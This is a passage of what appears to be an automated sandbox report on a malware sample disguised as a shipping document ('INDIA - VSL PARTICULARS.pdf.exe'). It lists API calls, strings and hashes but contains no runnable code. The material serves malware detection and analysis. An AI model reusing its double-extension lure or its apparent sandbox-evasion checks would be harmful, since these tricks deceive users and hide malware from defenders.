                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: '
                              • API String ID: 3850602802-1997036262
                              • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                              • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                              • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                              • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                              APIs
                              • _strlen.LIBCMT ref: 0040F858
                                • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                              • _sprintf.LIBCMT ref: 0040F9AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove$_sprintf_strlen
                              • String ID: %02X
                              • API String ID: 1921645428-436463671
                              • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                              • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                              • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                              • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                              APIs
                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: Combobox
                              • API String ID: 3850602802-2096851135
                              • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                              • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                              • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                              • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                              APIs
                              • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: LengthMessageSendTextWindow
                              • String ID: edit
                              • API String ID: 2978978980-2167791130
                              • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                              • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                              • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                              • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                              APIs
                              • Sleep.KERNEL32(00000000), ref: 00476CB0
                              • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: GlobalMemorySleepStatus
                              • String ID: @
                              • API String ID: 2783356886-2766056989
                              • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                              • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                              • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                              • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: htonsinet_addr
                              • String ID: 255.255.255.255
                              • API String ID: 3832099526-2422070025
                              • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                              • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                              • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                              • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                              APIs
                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: InternetOpen
                              • String ID: <local>
                              • API String ID: 2038078732-4266983199
                              • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                              • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                              • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                              • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __fread_nolock_memmove
                              • String ID: EA06
                              • API String ID: 1988441806-3962188686
                              • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                              • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                              • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                              • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: u,D
                              • API String ID: 4104443479-3858472334
                              • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                              • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                              • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                              • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                              APIs
                              • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • wsprintfW.USER32 ref: 0045612A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend_mallocwsprintf
                              • String ID: %d/%02d/%02d
                              • API String ID: 1262938277-328681919
                              • Opcode ID: 7568e53d503701dc6c53574dfbed37be0c9226c9331a2ec32bea4e30f7db6fe8
                              • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                              • Opcode Fuzzy Hash: 7568e53d503701dc6c53574dfbed37be0c9226c9331a2ec32bea4e30f7db6fe8
                              • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                              APIs
                              • InternetCloseHandle.WININET(?), ref: 00442663
                              • InternetCloseHandle.WININET ref: 00442668
                                • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CloseHandleInternet$ObjectSingleWait
                              • String ID: aeB
                              • API String ID: 857135153-906807131
                              • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                              • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                              • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                              • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                              APIs
                              Strings
                              • ^B, xrefs: 00433248
                              • C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe, xrefs: 0043324B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcsncpy
                              • String ID: ^B$C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe
                              • API String ID: 1735881322-2326306022
                              • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                              • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                              • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                              • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                              APIs
                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                              • PostMessageW.USER32(00000000), ref: 00441C05
                                • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: FindMessagePostSleepWindow
                              • String ID: Shell_TrayWnd
                              • API String ID: 529655941-2988720461
                              • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                              • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                              • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                              • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                              APIs
                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: FindMessagePostSleepWindow
                              • String ID: Shell_TrayWnd
                              • API String ID: 529655941-2988720461
                              • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                              • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                              • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                              • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                              APIs
                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Message_doexit
                              • String ID: AutoIt$Error allocating memory.
                              • API String ID: 1993061046-4017498283
                              • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                              • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                              • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                              • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D